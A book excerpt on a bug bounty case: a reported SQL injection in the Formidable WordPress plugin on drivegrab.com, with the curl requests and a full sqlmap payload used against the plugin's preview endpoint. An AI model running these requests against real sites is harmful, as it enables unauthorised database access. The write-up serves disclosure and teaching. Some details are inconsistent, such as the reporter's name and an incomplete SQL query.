- Bug Bounty Hunting Essentials
- Carlos A. Lozano Shahmeer Amir
- 487字
- 2021-06-10 18:35:34
Grab taxi SQL Injection
- Title: www.drivegrab.com SQL injection.
- Reported by: Jouko.
- Bounty rewarded: $4,500.
- Web application URL: http://www.grab.com.
- Description: Grab taxi is another ride-hailing service that is similar to Uber and it is very commonly used in the Asian region. Grab provides similar services to those of Uber but with extra benefits. This SQL vulnerability was identified by Jouku in the domain, https://www.grab.com/ph/driver/car/.
The website drivegrab.com is a WordPress-based website with mainly static content and basically, the vulnerability was found in a form crafting plugin called Formidable; the plugin used some AJAX functions to implement forms. Jouko identified that the AJAX functions that were intended for administrators were accessible to an unauthenticated user. In particular, the function was preview that was used preview forms once they were crafted, but it also allowed HTML functions and WordPress shortcodes, which later were converted into an SQL vulnerability due to one of the WordPress shortcodes.
Basically the vulnerability was that any authenticated user could call a form entry from within the database using the preview function, given that the database structure and IDs were known.
So, to test this, initially a curl request had to be crafted as follows:
curl -s -i 'https://www.drivegrab.com/wp-admin/admin-ajax.php' --data 'action=frm_forms_preview'
This request had a preset Contact us form in the response since the form ID was not defined. Next, Jouku tried to embed some HTML code to be shown after the form to verify if the injection of arbitrary content was possible:
curl -s -i 'https://www.drivegrab.com/wp-admin/admin-ajax.php' --data 'action=frm_forms_preview&after_html=hello world'
As a response to this request, a hello world was displayed in the response of the request after the Contact Us form. There are a number of shortcodes that the Formidable plugin accepts, one of which is display-frm-data to output the data entered by users in the forms if the ID of the form is known:
curl -s -i 'https://www.drivegrab.com/wp-admin/admin-ajax.php' --data 'action=frm_forms_preview&after_html=XXX[display-frm-data id=835]YYY'
From the previous URL, Jouko identified that, given the form and the correct prefixes and suffixes, the form entry could be harvested from the database. Not only that, he also identified that the plugin's parameters also accepted order_by and order queries for sorting the output:
curl -s -i 'https://www.drivegrab.com/wp-admin/admin-ajax.php' --data 'action=frm_forms_preview&after_html=XXX[display-frm-data id=835 order_by=id limit=1 order=zzz]YYY'
This was the final point of the exploit and then it was just a matter of crafting the right sqlmap payload to harvest the database; basically, the SQL code in the input into the Order_by clause of a query, which harvests the list of form IDs. So the final sqlmap payload, along with the eval parameter and others, looked like the following:
./sqlmap.py -u 'https://www.drivegrab.com/wp-admin/admin-ajax.php' --data 'action=frm_forms_preview&before_html=XXX[display-frm-data id=835 order_by=id limit=1 order="%2a( true=true )"]XXX' --param-del ' ' -p true --dbmsmysql --technique B --string persondetailstable --eval 'true=true.replace(",",",-it.id%2b");order_by="id,"*true.count(",")+"id"' --test-filter DUAL --tamper commalesslimit -D --sql-query "SELECT FROM WHERE id=2"
So using the previous payload and with the help of sqlmap, Jouku was able to prove SQL injection in the drivegrab.com website.
- 數(shù)據(jù)恢復方法及案例分析
- 工業(yè)物聯(lián)網(wǎng)安全
- 硬黑客:智能硬件生死之戰(zhàn)
- 計算機網(wǎng)絡(luò)安全基礎(chǔ)(第5版)
- 局域網(wǎng)交換機安全
- 學電腦安全與病毒防范
- 解密數(shù)據(jù)恢復
- Web安全之深度學習實戰(zhàn)
- 互聯(lián)網(wǎng)企業(yè)安全高級指南
- 網(wǎng)絡(luò)用戶行為的安全可信分析與控制
- 黑客攻防從入門到精通
- 網(wǎng)絡(luò)空間安全法律問題研究
- 云計算安全技術(shù)與應(yīng)用
- 動態(tài)賦能網(wǎng)絡(luò)空間防御
- 密碼朋克:自由與互聯(lián)網(wǎng)的未來